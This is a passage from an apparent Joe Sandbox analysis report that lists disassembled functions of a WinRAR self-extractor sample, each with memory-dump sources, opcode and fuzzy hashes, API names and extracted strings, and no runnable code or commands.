                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c2f19e6b73aee1f2f5e000d2da9400488e5c9e4bdb3b1ca053d999cefcb7b96b
                                                        • Instruction ID: 193d7ef76fad49858e95eaa769afa74637448216d3fc8f5534f79389bece3760
                                                        • Opcode Fuzzy Hash: c2f19e6b73aee1f2f5e000d2da9400488e5c9e4bdb3b1ca053d999cefcb7b96b
                                                        • Instruction Fuzzy Hash: 6FD1AC72A191E08EE312CB7AA0544BEBFB5E31D34DB898261DFD55364AC52EE102DB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D6B944 Relevance: .2, Instructions: 181COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1a52658466727774bbc5190e23dd1b7b6af61c425033d8b5861d1633cf72f70c
                                                        • Instruction ID: 4735a114c324935855ff9b30b375452c5524f60033875dcd55b4bfd7d509f192
                                                        • Opcode Fuzzy Hash: 1a52658466727774bbc5190e23dd1b7b6af61c425033d8b5861d1633cf72f70c
                                                        • Instruction Fuzzy Hash: CE615B23B195E19AEB11DF76C5404FDBFB5E719784B854032CFA95368ACA3CE205CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D98DB0 Relevance: .0, Instructions: 32COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a32c869db70b81adf3522ed7f59e1138653d4678039c6ce20c10f5af40288726
                                                        • Instruction ID: ac596ea15280381d35e8d503148dc0a69114257906651e05e0f7e549b164186d
                                                        • Opcode Fuzzy Hash: a32c869db70b81adf3522ed7f59e1138653d4678039c6ce20c10f5af40288726
                                                        • Instruction Fuzzy Hash: 4BF068717292658BDBA49F29F89262977D0F708380F80807AD79D83B44D73DD0618F54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D86AE4 Relevance: .0, Instructions: 2COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f94cb7f15edc88b1d12639b83f3e26873c5ba86b2582cc478741a5978fcbbfad
                                                        • Instruction ID: dfdb69341c79bfd9dd0375c38dff95f37cf7507b1f12b19232b0cd9cf18dff06
                                                        • Opcode Fuzzy Hash: f94cb7f15edc88b1d12639b83f3e26873c5ba86b2582cc478741a5978fcbbfad
                                                        • Instruction Fuzzy Hash: CFA0012590A906D2EB44AF02E8A0030B720BB90714B810131D26D811E1DE2CB880C2A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D861A0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 61libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                        • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                        • API String ID: 2565136772-3242537097
                                                        • Opcode ID: 0b79975b7dd6f8f0ba486823e03a824d6b613ffbf8d8ef1d3073c77c991e81f6
                                                        • Instruction ID: 58c94c5692ea409d5dec6677fd2e3b9d6bcd67c7fb59cfb2e00ddf978c432025
                                                        • Opcode Fuzzy Hash: 0b79975b7dd6f8f0ba486823e03a824d6b613ffbf8d8ef1d3073c77c991e81f6
                                                        • Instruction Fuzzy Hash: 5921B920A0AA0B93EF15BF52E8D4675B2A0BF44B50FC40035DB2E427E5EE2CE55583E0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D7DF44 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 269COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialog
                                                        • String ID: GETPASSWORD1$Software\WinRAR SFX
                                                        • API String ID: 431506467-1315819833
                                                        • Opcode ID: 298c586111d514159f6b3e130679215706b4aae0a9f6553a775b1ee798cc2d48
                                                        • Instruction ID: bd45be35c7c416e2d9bd72e048ac1e1bf2dec550e803bcfb4eac0dd0db8c78b3
                                                        • Opcode Fuzzy Hash: 298c586111d514159f6b3e130679215706b4aae0a9f6553a775b1ee798cc2d48
                                                        • Instruction Fuzzy Hash: C8B1A262F1974296FB00AF66D4C52BCB362BB45798F804235DF6C26AD9DE3CE445C390
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D91B20 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                        • API String ID: 3215553584-2617248754
                                                        • Opcode ID: ecb774820e808d1f0f9a4e937ddb804214af7c9ed034d139096f4d2aec068b6e
                                                        • Instruction ID: 3711a039317e0f695eb3fa21373d4e509675da848b58f4db76373e1184c43a1b
                                                        • Opcode Fuzzy Hash: ecb774820e808d1f0f9a4e937ddb804214af7c9ed034d139096f4d2aec068b6e
                                                        • Instruction Fuzzy Hash: 1A417D32A05B458AFB04DF26E8817AD73A4EB14798F844239DF6C47B94EE3CD025C394
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D82EA0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: Window$ButtonCheckedObject$ClassDeleteLongName
                                                        • String ID: STATIC
                                                        • API String ID: 781704138-1882779555
                                                        • Opcode ID: bc0be446892835b112d3ea8da969d9d501e29b07b714163f2e7357c3afb8a8db
                                                        • Instruction ID: af540e93b9a94629f5ee649693f8673222e266ee5e1d651d0a43bdc2527ac37c
                                                        • Opcode Fuzzy Hash: bc0be446892835b112d3ea8da969d9d501e29b07b714163f2e7357c3afb8a8db
                                                        • Instruction Fuzzy Hash: 22317025A1864247EB20AF13E8947B9F391BB89BC0F840031DF6D47BD6DE3CE40686A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D680B0 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 444COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                        • String ID: UNC$\\?\
                                                        • API String ID: 4097890229-253988292
                                                        • Opcode ID: 43643b174e56843467f28f8f267d802de6be347339de23e5bba293cc8b85cc71
                                                        • Instruction ID: 78f3d7cd9cea680a5daed3ac38ba585ced463780bd68e03963c9ddf96107dc60
                                                        • Opcode Fuzzy Hash: 43643b174e56843467f28f8f267d802de6be347339de23e5bba293cc8b85cc71
                                                        • Instruction Fuzzy Hash: 4812D122B0AA46D6EB10EF66D4941ADB371FB41B88F904131EB6D07AE9DF3CE545C390
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D7AAD0 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 204memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo_noreturn$AllocGlobal
                                                        • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                        • API String ID: 2721297748-1533471033
                                                        • Opcode ID: cfef3d20ae1ea1e771d0f4b428877c633816d15235bb3192cbe0bbbd29cc77e1
                                                        • Instruction ID: 315273a7a9dd0b7dcf14cb78adff81721a86e1ca13cca70ae5c77572d578bbd5
                                                        • Opcode Fuzzy Hash: cfef3d20ae1ea1e771d0f4b428877c633816d15235bb3192cbe0bbbd29cc77e1
                                                        • Instruction Fuzzy Hash: D181AF62B19A4696FB04EFA6D4902EDB371BB44B84F804535CF2D177DAEE38D506C3A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D7E9A0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: Item$Text
                                                        • String ID: LICENSEDLG
                                                        • API String ID: 1601838975-2177901306
                                                        • Opcode ID: b6b3d31fd237dc538bae67d25694d29fd7603d5cdce674f81891652934a12be7
                                                        • Instruction ID: bbb666a7da5b4f454d7649767b48a808fc2adf441f9f915a81cb07f641eb35d2
                                                        • Opcode Fuzzy Hash: b6b3d31fd237dc538bae67d25694d29fd7603d5cdce674f81891652934a12be7
                                                        • Instruction Fuzzy Hash: E941A021A1865283FB64AF13E8847B8B7A1FB85B90F840135DB2E03BD5DF3CA54583A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D6BD2C Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 84libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$CurrentDirectoryProcessSystem
                                                        • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                        • API String ID: 2915667086-2207617598
                                                        • Opcode ID: 650d80ab3b9444374d6aba1c01b0a764a9533b8d21915374c342d0535c25459a
                                                        • Instruction ID: 997ca529c5e6b2a4487609d8058f314b5c1c67c0c3c3f4fa2f87cd1010c65b83
                                                        • Opcode Fuzzy Hash: 650d80ab3b9444374d6aba1c01b0a764a9533b8d21915374c342d0535c25459a
                                                        • Instruction Fuzzy Hash: BA313824A0AA96A3EB04AF17E8D0174F7A0BF45B94B854135CB7E477E9DF3CE44187A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D7C3D4 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 415COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                        • String ID: $
                                                        • API String ID: 3668304517-227171996
                                                        • Opcode ID: 81ccb3cb22b2da4d31f11f4697d00a3e73a363ac1590a73fca997ac7dc05c7b6
                                                        • Instruction ID: ce4df45bbf1bc5b94d771da1f33679a1247ee5db86f3b70d90c8e67b71d5092b
                                                        • Opcode Fuzzy Hash: 81ccb3cb22b2da4d31f11f4697d00a3e73a363ac1590a73fca997ac7dc05c7b6
                                                        • Instruction Fuzzy Hash: 74F19E62F24A4686EB10AF66D4C81BCB361BB45FD8F905631CB6D136D9DF7CE18083A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D88D3C Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 317COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 2940173790-393685449
                                                        • Opcode ID: fc96c41de242e073b5df66b8ea50f0a6a3e6c880f4afa60ca767e4a75ab88775
                                                        • Instruction ID: 3ea25efa51b1dc97265eebbab448369fa12923328a7d2b4c21c637cc8ff3d5cd
                                                        • Opcode Fuzzy Hash: fc96c41de242e073b5df66b8ea50f0a6a3e6c880f4afa60ca767e4a75ab88775
                                                        • Instruction Fuzzy Hash: 28E18E72A087828BE711AF26D4C02BDB7A0FB44B48F940135EBAD576D6DF38E481C790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D71BBC Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 160COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00007FF7F4D70A5C: CompareStringW.KERNEL32(?,?,00007FF7F4D66C19), ref: 00007FF7F4D70A7B
                                                          • Part of subcall function 00007FF7F4D612BC: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7F4D613B6
                                                          • Part of subcall function 00007FF7F4D70A8C: CompareStringW.KERNEL32 ref: 00007FF7F4D70AFC
                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F4D71D8A
                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F4D71D90
                                                        • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7F4D71DED
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: CompareString_invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskswprintf
                                                        • String ID: .zipx$.zx$z%s%02d
                                                        • API String ID: 2859674139-515631857
                                                        • Opcode ID: f06826b8e781a727c2983ec197f4ca2108c271821059ba588ffbc3eac0866503
                                                        • Instruction ID: eb2c33167a77e07b281e51e260b302c7e8a0851622f48b7c4be668a6e50e6fbd
                                                        • Opcode Fuzzy Hash: f06826b8e781a727c2983ec197f4ca2108c271821059ba588ffbc3eac0866503
                                                        • Instruction Fuzzy Hash: 1671A222A15B429AEB10EF66D4D13EDB361FB84788F805236EB6C46BD9DF38D144C790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D8A83C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF7F4D8AA43,?,?,?,00007FF7F4D887AE,?,?,?,00007FF7F4D88769), ref: 00007FF7F4D8A8C1
                                                        • GetLastError.KERNEL32(?,?,00000000,00007FF7F4D8AA43,?,?,?,00007FF7F4D887AE,?,?,?,00007FF7F4D88769), ref: 00007FF7F4D8A8CF
                                                        • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF7F4D8AA43,?,?,?,00007FF7F4D887AE,?,?,?,00007FF7F4D88769), ref: 00007FF7F4D8A8F9
